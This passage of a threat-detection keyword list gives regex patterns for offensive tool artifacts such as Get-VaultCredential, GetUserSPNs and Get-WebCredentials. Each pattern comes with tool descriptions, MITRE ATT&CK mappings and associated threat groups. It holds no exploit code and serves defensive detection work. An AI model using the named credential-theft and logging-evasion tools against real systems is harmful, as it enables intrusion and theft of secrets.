Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46306" "*get-userPassword.py*",".{0,1000}get\-userPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46307" 
"*Get-UserPrivileges*",".{0,1000}Get\-UserPrivileges.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46308" "*Get-UserPRTToken*",".{0,1000}Get\-UserPRTToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46309" "*GetUserSPNs.*",".{0,1000}GetUserSPNs\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46310" "*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46311" "*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46312" "*GetUserSPNs.py*",".{0,1000}GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46313" 
"*GetUserSPNs.vbs*",".{0,1000}GetUserSPNs\.vbs.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","46314" "*getusrdompwinfo *;quit*",".{0,1000}getusrdompwinfo\s.{0,1000}\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46315" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46316" "*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46317" "*Get-VaultCredential.ps1*",".{0,1000}Get\-VaultCredential\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46318" "*Get-VaultCreds*",".{0,1000}Get\-VaultCreds.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46319" "*Get-VolumeShadowCopy *",".{0,1000}Get\-VolumeShadowCopy\s.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that 
could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46320" "*Get-VolumeShadowCopy*",".{0,1000}Get\-VolumeShadowCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46321" "*Get-VulnAutoRun*",".{0,1000}Get\-VulnAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46322" "*Get-VulnSchTask*",".{0,1000}Get\-VulnSchTask.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46323" "*Get-WebCredentials*",".{0,1000}Get\-WebCredentials.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46324" "*Get-WebCredentials.ps1*",".{0,1000}Get\-WebCredentials\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","46325" "*GetWebDAVStatus.csproj*",".{0,1000}GetWebDAVStatus\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - 
Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46326" "*GetWebDAVStatus.sln*",".{0,1000}GetWebDAVStatus\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 
Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46327" "*GetWebDAVStatus_DotNet*",".{0,1000}GetWebDAVStatus_DotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46328" "*GetWebDAVStatus_x64.o*",".{0,1000}GetWebDAVStatus_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","46329" "*GetWhoamiCommand*",".{0,1000}GetWhoamiCommand.{0,1000}","offensive_tool_keyword","C2 related 
tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","46330" "*GetWhoamiCommand.cs*",".{0,1000}GetWhoamiCommand\.cs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative use case for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","46331" "*GetWindowsCredentials.exe*",".{0,1000}GetWindowsCredentials\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","46332" "*Get-WinUpdates.ps1*",".{0,1000}Get\-WinUpdates\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - 